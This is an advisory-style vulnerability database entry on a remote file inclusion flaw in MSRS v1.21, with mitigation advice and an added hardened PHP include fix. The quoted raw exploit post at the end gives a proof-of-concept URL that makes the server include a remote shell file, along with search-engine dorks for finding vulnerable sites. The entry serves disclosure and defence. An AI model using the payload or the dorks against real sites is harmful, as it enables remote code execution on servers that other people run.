Vendor: MSRS
By: Unknown
CVSS: 7.5 (HIGH)
CWE: Remote File Inclusion
Product Name: MSRS
Affected Version From: v1.21
Affected Version To: v1.21
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

MSRS v.1.21 Remote File Inclusion

The MSRS v.1.21 application is vulnerable to remote file inclusion. An attacker can exploit this vulnerability by including a malicious file from a remote server. This can lead to remote code execution or unauthorized access to sensitive files on the target system.

Mitigation:

To mitigate this vulnerability, it is recommended to apply the latest patch or update to a version that is not affected by this vulnerability. Additionally, ensure that input validation is implemented to prevent remote file inclusion attacks.
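
A hardened form of the include at line 3 of /_theme/breadcrumb.php (quoted in the raw data below), added here as an example; it is not MSRS code or a vendor patch. It assumes that $rootBase reaches the script from the request through register_globals-style variable import, as the query-string parameter in the PoC implies, and that the application root is the parent directory of _theme/.

```php
<?php
// Added example, not part of MSRS. Replaces the vulnerable line:
//     include($rootBase . '/_inc/breadcrumb.php');
// where $rootBase was never set by the script itself.

// Defence in depth in php.ini (real directives):
//   register_globals  = Off   ; directive removed entirely in PHP 5.4
//   allow_url_include = Off   ; available since PHP 5.2
//   allow_url_fopen   = Off   ; also blocks URL includes on PHP older than 5.2

// 1. Derive the base path from this file's location, never from the request.
//    Assumption: the application root is the parent of _theme/.
$rootBase = realpath(dirname(__FILE__) . '/..');

// 2. Resolve the include target to a canonical local path.
//    realpath() returns false for anything that is not an existing local
//    file, which includes http:// and ftp:// URLs.
$incDir = realpath($rootBase . '/_inc');
$target = realpath($incDir . '/breadcrumb.php');

// 3. Refuse to include unless the resolved file sits inside <root>/_inc/.
$prefix = $incDir . DIRECTORY_SEPARATOR;
if ($incDir === false || $target === false
    || strncmp($target, $prefix, strlen($prefix)) !== 0) {
    header('HTTP/1.1 500 Internal Server Error');
    exit('Include path could not be resolved.');
}

include $target;
```

Because $rootBase is assigned unconditionally before use, a request-supplied value of the same name is overwritten even on a server where register_globals is still enabled.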

Exploit-DB raw data:

MSRS v.1.21 Remote File Inclusion

Author Site : http://www.myspacepros.com/

POC :

/_theme/breadcrumb.php Line No. 3

<?php include($rootBase . '/_inc/breadcrumb.php'); ?>

Usage : http://site.com/_theme/breadcrumb.php?rootBase=http://domain.com/shell.txt?

D0rks :

inurl:/Generators/Layout_Generator
"!new Female Celebrities"
inurl:/Generators/Scrollbar_Colors

# milw0rm.com [2007-10-29]